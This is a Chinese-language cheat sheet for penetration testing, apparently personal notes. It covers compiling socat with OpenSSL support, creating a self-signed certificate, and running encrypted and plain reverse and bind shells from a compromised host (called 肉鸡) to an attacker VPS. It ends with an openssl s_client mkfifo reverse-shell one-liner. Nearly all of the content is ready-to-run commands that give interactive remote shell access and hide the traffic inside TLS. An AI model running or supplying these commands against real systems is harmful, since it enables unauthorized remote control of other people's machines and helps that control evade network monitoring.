编译环境
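# CentOS 8 build environment for socat.
# Install the build dependencies non-interactively (the original gcc-c++ line
# lacked -y and would stop to prompt).
yum install -y gcc-c++ openssl-devel make readline-devel
# Fetch the source tarball. The download is over plain http, so verify the
# archive against the checksum/signature published by the project before
# unpacking it.
wget http://www.dest-unreach.org/socat/download/socat-1.7.4.4.tar.gz
tar -zxvf socat-1.7.4.4.tar.gz
# '&&', not '&': the original backgrounded 'cd' and then ran ./configure in
# the current directory instead of the extracted source tree.
cd socat-1.7.4.4 && ./configure --enable-openssl-method
make
# Print the version of the freshly built binary.
# Note: the binary links dynamically against this host's libreadline/libssl,
# so it will not run unchanged on systems with different library versions
# (see the libreadline.so.7 error on Ubuntu 20.04 noted below).
./socat -V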
# 运行
Ubuntu 18.04.6 LTS 正常
CentOS Linux 8 正常
CentOS Stream 9 报错:无法执行二进制文件,可执行文件格式错误
Ubuntu 20.04.5 LTS 报错:error while loading shared libraries: libreadline.so.7: cannot open shared object file(二进制文件动态链接了编译主机的 libreadline,目标主机上必须存在同一版本的库)
# 官方文档
http://www.dest-unreach.org/socat/doc/socat-openssltunnel.html
http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_OPENSSL_LISTEN
http://www.dest-unreach.org/socat/doc/CHANGES
证书生成
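# Self-signed certificate for the socat OpenSSL tunnel.
# FILENAME is the basename of the generated .key/.crt/.pem files.
FILENAME=filename
# Private key. Expansions are quoted so a basename containing spaces or glob
# characters cannot split into extra arguments; the key is restricted to the
# owner immediately because it is later concatenated into the .pem.
openssl genrsa -out "$FILENAME.key" 2048
chmod 600 "$FILENAME.key"
# Self-signed X.509 certificate, valid 3653 days. When prompted, set
# [Common Name] to the public IP of the VPS.
openssl req -new -key "$FILENAME.key" -x509 -days 3653 -out "$FILENAME.crt"
# Combined key+certificate bundle used as cert= by socat. It contains the
# private key, so it gets the same 0600 permissions as the key.
cat "$FILENAME.key" "$FILENAME.crt" > "$FILENAME.pem"
chmod 600 "$FILENAME.pem"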
socat加密反弹shell
# 加密正向shell,可交互,但ctrl+c会退出shell
vps: ./socat openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr
肉鸡: ./socat readline openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt
# 加密反弹shell,可交互,但ctrl+c会退出shell
vps: ./socat readline openssl-listen:4433,reuseaddr,cert=filename.pem,cafile=filename.crt
肉鸡: ./socat openssl:x.x.x.x:4433,cert=filename.pem,cafile=filename.crt system:bash,pty,stderr
#反弹shell,稳定的终端(注意:verify=0 关闭了对端证书校验,连接仅加密而不认证对端)
vps:socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0
反弹:socat OPENSSL:x.x.x.x:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane

socat未加密反弹shell
./socat file:tty,raw,echo=0 tcp-listen:4433
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:x.x.x.x:4433


openssl加密反弹shell
# 在vps上生成SSL证书的公钥/私钥对
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# 在vps上监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 80
# 在肉鸡上执行反弹
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect x.x.x.x:80 > /tmp/s; rm /tmp/s
#tips:
https://www.freebuf.com/articles/web/328278.html 关于渗透测试中的shell那些事
https://blog.maxkit.com.tw/2021/11/socat.html
https://tw.coderbridge.com/questions/3534af0968df4025a68916df1c5de76c